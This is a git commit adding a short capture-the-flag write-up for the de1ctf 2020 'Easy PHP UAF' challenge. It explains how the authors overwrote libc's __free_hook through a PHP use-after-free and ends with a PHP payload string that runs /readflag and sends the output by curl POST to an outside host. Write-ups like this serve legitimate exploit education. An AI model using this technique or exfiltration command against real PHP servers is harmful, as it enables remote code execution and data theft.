Create README.md

owodelta · web-flow · commit 4364b34c9c57 · 2020-05-06T13:10:50.000+03:00
diff --git a/2020/de1ctf-2020/Easy PHP UAF/README.md b/2020/de1ctf-2020/Easy PHP UAF/README.md
@@ -0,0 +1,15 @@
+In this challenge we decided not to go with further php object corruption (ain't got no time for digging php internals). Instead we overwrote `__free_hook` in libc.
+
+Now there are some problems as to how you can reliably get the offset to `__free_hook`. We solved it by dumping memory with the help of relative read and then finding the `/bin/sh` string inside that dump.
+This gives us the offset to the base of libc (while addresses could be dumped by reading `/proc/self/maps`).
+
+The final stage of the exploit is to trigger `free()` with controlled data, this is done by triggering fatal error inside php by calling non-existent function with broken name that contains the command we want to execute.
+
+```
+    $a = ";/readflag > /tmp/sicemehackerman; curl -X POST http://REDACTED/ -d \"@/tmp/sicemehackerman\";#";
+    try{
+    $_SERVER['DEET'] = $a();
+}catch(Exception $e){
+    echo("exception");
+}
+```
